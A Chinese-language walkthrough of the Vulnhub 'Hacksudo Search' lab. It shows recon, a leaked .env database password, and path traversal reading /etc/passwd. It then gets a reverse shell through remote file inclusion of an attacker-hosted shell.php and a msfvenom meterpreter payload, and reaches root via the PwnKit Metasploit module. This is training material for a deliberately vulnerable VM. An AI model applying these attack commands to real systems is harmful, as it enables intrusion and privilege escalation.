Vulnhub之Hacksudo Search靶机详细测试过程（不同提权方法） ...

Hacksudo Search

识别目标主机IP地址

1. (kali㉿kali)-[~/Desktop/Vulnhub/HacksudoSearch]
2. └─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
3. Currently scanning: 192.168.56.0/24   |   Screen View: Unique Hosts                                                                                       
4.                                                                                                                                                             
5. 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180                                                                                            
6. _____________________________________________________________________________
7.    IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
8. -----------------------------------------------------------------------------
9. 192.168.56.1    0a:00:27:00:00:11      1      60  Unknown vendor                                                                                          
10. 192.168.56.100  08:00:27:f5:05:04      1      60  PCS Systemtechnik GmbH                                                                                   
11. 192.168.56.162  08:00:27:b8:ce:1e      1      60  PCS Systemtechnik GmbH     

复制代码

利用Kali Linux的netdiscover工具识别目标主机的IP地址为192.168.56.162
NMAP扫描

1. ┌──(kali㉿kali)-[~/Desktop/Vulnhub/HacksudoSearch]
2. └─$ sudo nmap -sS -sV -sC -p- 192.168.56.162 -oN nmap_full_scan
3. Starting Nmap 7.92 ( https://nmap.org ) at 2023-04-24 21:30 EDT
4. Nmap scan report for bogon (192.168.56.162)
5. Host is up (0.00013s latency).
6. Not shown: 65533 closed tcp ports (reset)
7. PORT   STATE SERVICE VERSION
8. 22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
9. | ssh-hostkey:
10. |   2048 7b:44:7c:da:fb:e5:e6:1d:76:33:eb:fa:c0:dd:77:44 (RSA)
11. |   256 13:2d:45:07:32:83:13:eb:4e:a1:20:f4:06:ba:26:8a (ECDSA)
12. |_  256 21:a1:86:47:07:1b:df:b2:70:7e:d9:30:e3:29:c2:e7 (ED25519)
13. 80/tcp open  http    Apache httpd 2.4.38 ((Debian))
14. |_http-title: HacksudoSearch
15. |_http-server-header: Apache/2.4.38 (Debian)
16. MAC Address: 08:00:27:B8:CE:1E (Oracle VirtualBox virtual NIC)
17. Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
19. Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
20. Nmap done: 1 IP address (1 host up) scanned in 10.71 seconds
21.                                                                         

复制代码

NMAP扫描结果表明目标主机有2个开放端口：22（ssh)、80(http)
获得Shell

1. ──(kali㉿kali)-[~/Desktop/Vulnhub/HacksudoSearch]
2. └─$ curl http://192.168.56.162/robots.txt
3. /* find me * im number 1 search engine .
4. just joking :)
5. www.hacksudo.com
6.                                                                                                                                                             
7. ┌──(kali㉿kali)-[~/Desktop/Vulnhub/HacksudoSearch]
8. └─$ nikto -h http://192.168.56.162
9. - Nikto v2.1.6
10. ---------------------------------------------------------------------------
11. + Target IP:          192.168.56.162
12. + Target Hostname:    192.168.56.162
13. + Target Port:        80
14. + Start Time:         2023-04-24 22:26:53 (GMT-4)
15. ---------------------------------------------------------------------------
16. + Server: Apache/2.4.38 (Debian)
17. + The anti-clickjacking X-Frame-Options header is not present.
18. + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
19. + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
20. + No CGI Directories found (use '-C all' to force check all possible dirs)
21. + OSVDB-630: The web server may reveal its internal or real IP in the Location header via a request to /images over HTTP/1.0. The value is "127.0.0.1".
22. + Web Server returns a valid response with junk HTTP methods, this may cause false positives.
23. + OSVDB-3268: /account/: Directory indexing found.
24. + OSVDB-3092: /account/: This might be interesting...
25. + OSVDB-3233: /icons/README: Apache default file found.
26. + /.env: .env file found. The .env file may contain credentials.
27. + 7915 requests: 0 error(s) and 9 item(s) reported on remote host
28. + End Time:           2023-04-24 22:27:52 (GMT-4) (59 seconds)
29. ---------------------------------------------------------------------------
30. + 1 host(s) tested
33.       *********************************************************************
34.       Portions of the server's headers (Apache/2.4.38) are not in
35.       the Nikto 2.1.6 database or are newer than the known string. Would you like
36.       to submit this information (*no server specific data*) to CIRT.net
37.       for a Nikto update (or you may email to sullo@cirt.net) (y/n)?

复制代码

nikto发现目录/account/，该目录下虽然有众多文件，但是访问这些文件，返回均为空。
nikto另外发现了/.env，

1. ┌──(kali㉿kali)-[~/Desktop/Vulnhub/HacksudoSearch]
2. └─$ curl http://192.168.56.162/.env      
3. APP_name=HackSudoSearch
4. APP_ENV=local
5. APP_key=base64:aGFja3N1ZG8gaGVscCB5b3UgdG8gbGVhcm4gQ1RGICwgY29udGFjdCB1cyB3d3cuaGFja3N1ZG8uY29tL2NvbnRhY3QK
6. APP_DEBUG=false
7. APP_URL=http://localhost
9. LOG_CHANNEL=stack
11. DB_CONNECTION=mysql
12. DB_HOST=127.0.0.1
13. DB_PORT=3306
14. DB_USERNAME=hiraman
15. DB_PASSWORD=MyD4dSuperH3r0!

复制代码

该文件包含了数据库连接用户名和密码，但是该用户名不能用于SSH

1. ┌──(kali㉿kali)-[~/Desktop/Vulnhub/HacksudoSearch]
2. └─$ ssh hiraman@192.168.56.162                                 
3. The authenticity of host '192.168.56.162 (192.168.56.162)' can't be established.
4. ED25519 key fingerprint is SHA256:dzS9ujCpu8ohIPbqCaxf4e6gi5YSgBrhAI8srwr1giU.
5. This key is not known by any other names
6. Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
7. Warning: Permanently added '192.168.56.162' (ED25519) to the list of known hosts.
8. hiraman@192.168.56.162's password:
9. Permission denied, please try again.
10. hiraman@192.168.56.162's password:

复制代码

1. ──(kali㉿kali)-[~/Desktop/Vulnhub/HacksudoSearch]
2. └─$ gobuster dir -u http://192.168.56.162 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.txt,.bak,.js,.sh
3. ===============================================================
4. Gobuster v3.5
5. by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
6. ===============================================================
7. [+] Url:                     http://192.168.56.162
8. [+] Method:                  GET
9. [+] Threads:                 10
10. [+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
11. [+] Negative Status codes:   404
12. [+] User Agent:              gobuster/3.5
13. [+] Extensions:              php,html,txt,bak,js,sh
14. [+] Timeout:                 10s
15. ===============================================================
16. 2023/04/24 22:31:27 Starting gobuster in directory enumeration mode
17. ===============================================================
18. /.html                (Status: 403) [Size: 279]
19. /.php                 (Status: 403) [Size: 279]
20. /images               (Status: 301) [Size: 317] [--> http://192.168.56.162/images/]
21. /index.php            (Status: 200) [Size: 715]
22. /search.php           (Status: 200) [Size: 165]
23. /submit.php           (Status: 200) [Size: 165]
24. /assets               (Status: 301) [Size: 317] [--> http://192.168.56.162/assets/]
25. /account              (Status: 301) [Size: 318] [--> http://192.168.56.162/account/]
26. /javascript           (Status: 301) [Size: 321] [--> http://192.168.56.162/javascript/]
27. /robots.txt           (Status: 200) [Size: 75]
28. /LICENSE              (Status: 200) [Size: 1074]
29. /search1.php          (Status: 200) [Size: 2918]

复制代码

Gobuster工具扫描出文件/search1.php，访问该文件，其中contact,作者给出提示，需要FUZZ参数，因此接下来用wfuzz工具进行FUZZING

1. ┌──(kali㉿kali)-[~/Desktop/Vulnhub/HacksudoSearch]
2. └─$ wfuzz -c -u 'http://192.168.56.162/search1.php?FUZZ=../../../../../etc/passwd' -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --hw 288
3. /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
4. ********************************************************
5. * Wfuzz 3.1.0 - The Web Fuzzer                         *
6. ********************************************************
8. Target: http://192.168.56.162/search1.php?FUZZ=../../../../../etc/passwd
9. Total requests: 220560
11. =====================================================================
12. ID           Response   Lines    Word       Chars       Payload                                                                                    
13. =====================================================================
15. 000001129:   200        143 L    260 W      3797 Ch     "me"                        

复制代码

FUZZ出参数名称为me

1. ┌──(kali㉿kali)-[~/Desktop/Vulnhub/HacksudoSearch]
2. └─$ curl http://192.168.56.162/search1.php?me=../../../../../../etc/passwd
5. <body >
7. <font color=white>
10.   <a  target="_blank" href="https://www.cnblogs.com/?find=home.php">Home</a>
11.   <a target="_blank" href="https://www.cnblogs.com/?Me=about.php">About</a>
12.   <a target="_blank" href="https://www.cnblogs.com/?FUZZ=contact.php">Contact</a>
13.   
14.     <form action="submit.php">
15.       <input type="text" placeholder="Search.." name="search">
16.       <button type="submit"><i ></i></button>
17.     </form>
18.   
22.   <h1><font color=red>HackSudo</font> Search box</h1>
23.   <p>JumpStation The web crawler with Google</p>
26. root:x:0:0:root:/root:/bin/bash
27. daemon:*:1:1:daemon:/usr/sbin:/usr/sbin/nologin
28. bin:*:2:2:bin:/bin:/usr/sbin/nologin
29. sys:*:3:3:sys:/dev:/usr/sbin/nologin
30. sync:*:4:65534:sync:/bin:/bin/sync
31. games:*:5:60:games:/usr/games:/usr/sbin/nologin
32. man:*:6:12:man:/var/cache/man:/usr/sbin/nologin
33. lp:*:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
34. mail:*:8:8:mail:/var/mail:/usr/sbin/nologin
35. news:*:9:9:news:/var/spool/news:/usr/sbin/nologin
36. uucp:*:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
37. proxy:*:13:13:proxy:/bin:/usr/sbin/nologin
38. www-data:*:33:33:www-data:/var/www:/usr/sbin/nologin
39. backup:*:34:34:backup:/var/backups:/usr/sbin/nologin
40. list:*:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
41. irc:*:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
42. gnats:*:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
43. nobody:*:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
44. _apt:*:100:65534::/nonexistent:/usr/sbin/nologin
45. systemd-timesync:*:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
46. systemd-network:*:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
47. systemd-resolve:*:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
48. hacksudo:x:1000:1000:hacksudo,,,:/home/hacksudo:/bin/bash
49. systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
50. messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
51. sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
52. mysql:x:106:112:MySQL Server,,,:/nonexistent:/bin/false
53. monali:x:1001:1001:,,,:/home/monali:/bin/bash
54. john:x:1002:1002:,,,:/home/john:/bin/bash
55. search:x:1003:1003:,,,:/home/search:/bin/bash
56.                 </form>
57. </font>
58. <font color=red><h2><marquee> <a target="_blank" href="https://www.hacksudo.com/">Visit --> www.hacksudo.com</marquee></h2></a>
59. </font>
60.         
61. </body>
62. </html>

复制代码

看是否存在SSH私钥文件

1. http://192.168.56.162/search1.php?me=../../../../../../home/search/.ssh/id_rsa

复制代码

经过测试3个普通用户均不存在ssh私钥文件。
接下来看是否有远程文件包含漏洞：

1. http://192.168.56.162/search1.php?me=http://192.168.56.230:8000/test.txt

复制代码

经过尝试，目标存在远程文件包含漏洞，因此在Kali linux端准备好shell.php文件，并启动http.server
访问下述URL：

1. http://192.168.56.162/search1.php?me=http://192.168.56.230:8000/shell.php

复制代码

在Kali linux上得到目标主机反弹回来的shell

1. ┌──(kali㉿kali)-[~/Desktop/Vulnhub/HacksudoSearch]
2. └─$ sudo nc -nlvp 5555                                         
3. [sudo] password for kali:
4. listening on [any] 5555 ...
5. connect to [192.168.56.230] from (UNKNOWN) [192.168.56.162] 55864
6. Linux HacksudoSearch 4.19.0-14-amd64 #1 SMP Debian 4.19.171-2 (2021-01-30) x86_64 GNU/Linux
7. 22:00:50 up 40 min,  0 users,  load average: 0.01, 1.18, 1.25
8. USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
9. uid=33(www-data) gid=33(www-data) groups=33(www-data)
10. /bin/sh: 0: can't access tty; job control turned off
11. $ which python
12. /usr/bin/python
13. $ python -c 'import pty;pty.spawn("/bin/bash")'
14. www-data@HacksudoSearch:/$ cd /home
15. cd /home
16. www-data@HacksudoSearch:/home$ ls -alh
17. ls -alh
18. total 24K
19. drwxr-xr-x  6 root     root     4.0K Apr 15  2021 .
20. drwxr-xr-x 18 root     root     4.0K Apr 11  2021 ..
21. drwxr-x---  6 hacksudo hacksudo 4.0K Apr 15  2021 hacksudo
22. drwxr-x---  2 john     john     4.0K Apr 13  2021 john
23. drwxr-x---  2 monali   monali   4.0K Apr 13  2021 monali
24. drwxr-x---  2 search   search   4.0K Apr 15  2021 search

复制代码

提权

利用msfvenom工具生成payload，将payload上传至目标主机/tmp目录，然后执行该文件

1. ─(kali㉿kali)-[~/Desktop/Vulnhub/HacksudoSearch]
2. └─$ msfvenom -p  linux/x86/meterpreter/reverse_tcp  LHOST=192.168.56.230 LPORT=6666 -f elf -o escalate.elf

复制代码

1. [/code][code]msf6 > use exploit/multi/handler
2. [*] Using configured payload generic/shell_reverse_tcp
3. msf6 exploit(multi/handler) > set payload linux/x86/meterpreter/reverse_tcp
4. payload => linux/x86/meterpreter/reverse_tcp
5. msf6 exploit(multi/handler) > show options
7. Module options (exploit/multi/handler):
9.    Name  Current Setting  Required  Description
10.    ----  ---------------  --------  -----------
13. Payload options (linux/x86/meterpreter/reverse_tcp):
15.    Name   Current Setting  Required  Description
16.    ----   ---------------  --------  -----------
17.    LHOST                   yes       The listen address (an interface may be specified)
18.    LPORT  4444             yes       The listen port
21. Exploit target:
23.    Id  Name
24.    --  ----
25.    0   Wildcard Target
28. msf6 exploit(multi/handler) > set LHOST 192.168.56.230
29. LHOST => 192.168.56.230
30. msf6 exploit(multi/handler) > set LPORT 6666
31. LPORT => 6666
32. msf6 exploit(multi/handler) > run
34. [*] Started reverse TCP handler on 192.168.56.230:6666
35. [*] Sending stage (989032 bytes) to 192.168.56.162
36. [*] Meterpreter session 1 opened (192.168.56.230:6666 -> 192.168.56.162:33994) at 2023-04-24 22:51:21 -0400
38. meterpreter > background
39. [*] Backgrounding session 1...
40. msf6 exploit(multi/handler) > search suggester
42. Matching Modules
43. ================
45.    #  Name                                      Disclosure Date  Rank    Check  Description
46.    -  ----                                      ---------------  ----    -----  -----------
47.    0  post/multi/recon/local_exploit_suggester                   normal  No     Multi Recon Local Exploit Suggester
50. Interact with a module by name or index. For example info 0, use 0 or use post/multi/recon/local_exploit_suggester
52. msf6 exploit(multi/handler) > use  post/multi/recon/local_exploit_suggester
53. msf6 post(multi/recon/local_exploit_suggester) > show options
55. Module options (post/multi/recon/local_exploit_suggester):
57.    Name             Current Setting  Required  Description
58.    ----             ---------------  --------  -----------
59.    SESSION                           yes       The session to run this module on
60.    SHOWDESCRIPTION  false            yes       Displays a detailed description for the available exploits
62. msf6 post(multi/recon/local_exploit_suggester) > set SESSION 1
63. SESSION => 1
64. msf6 post(multi/recon/local_exploit_suggester) > run
66. [*] 192.168.56.162 - Collecting local exploits for x86/linux...
67. [*] 192.168.56.162 - 167 exploit checks are being tried...
68. [+] 192.168.56.162 - exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec: The target is vulnerable.
69. [+] 192.168.56.162 - exploit/linux/local/pkexec: The service is running, but could not be validated.
70. [+] 192.168.56.162 - exploit/linux/local/su_login: The target appears to be vulnerable.
71. [*] Running check method for exploit 48 / 48
72. [*] 192.168.56.162 - Valid modules for session 1:
73. ============================
75. #   Name                                                               Potentially Vulnerable?  Check Result
76. -   ----                                                               -----------------------  ------------
77. 1   exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec                Yes                      The target is vulnerable.
78. 2   exploit/linux/local/pkexec                                         Yes                      The service is running, but could not be validated.
79. 3   exploit/linux/local/su_login                                       Yes                      The target appears to be vulnerable.

复制代码

选择提权模块，然后提权
[code]msf6 post(multi/recon/local_exploit_suggester) > use exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec

No payload configured, defaulting to linux/x64/meterpreter/reverse_tcpmsf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > show options Module options (exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec):   Name          Current Setting  Required  Description   ----          ---------------  --------  -----------   PKEXEC_PATH                    no        The path to pkexec binary   SESSION                        yes       The session to run this module on   WRITABLE_DIR  /tmp             yes       A directory where we can write filesPayload options (linux/x64/meterpreter/reverse_tcp):   Name   Current Setting  Required  Description   ----   ---------------  --------  -----------   LHOST  10.0.2.15        yes       The listen address (an interface may be specified)   LPORT  4444             yes       The listen portExploit target:   Id  Name   --  ----   0   x86_64msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > set LHOST 192.168.56.230LHOST => 192.168.56.230msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > set LPORT 8888LPORT => 8888msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > set SESSION 1SESSION => 1msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > run

Started reverse TCP handler on 192.168.56.230:8888

Running automatic check ("set AutoCheck false" to disable)[!] Verify cleanup of /tmp/.aqmsnondyug[+] The target is vulnerable.

Writing '/tmp/.esjvtiaf/vswplcef/vswplcef.so' (548 bytes) ...[!] Verify cleanup of /tmp/.esjvtiaf

Sending stage (3020772 bytes) to 192.168.56.162[+] Deleted /tmp/.esjvtiaf/vswplcef/vswplcef.so[+] Deleted /tmp/.esjvtiaf/.qbbgfqf[+] Deleted /tmp/.esjvtiaf

Meterpreter session 2 opened (192.168.56.230:8888 -> 192.168.56.162:40940) at 2023-04-24 22:55:08 -0400meterpreter > shellProcess 1145 created.Channel 1 created.id uid=0(root) gid=0(root) groups=0(root),33(www-data)cd /rootlsnotes.txtroot.txtcat notes.txt _                _                  _                                 _| |__   __ _  ___| | _____ _   _  __| | ___    ___  ___  __ _ _ __ ___| |__| '_ \ / _` |/ __| |/ / __| | | |/ _` |/ _ \  / __|/ _ \/ _` | '__/ __| '_ \| | | | (_| | (__|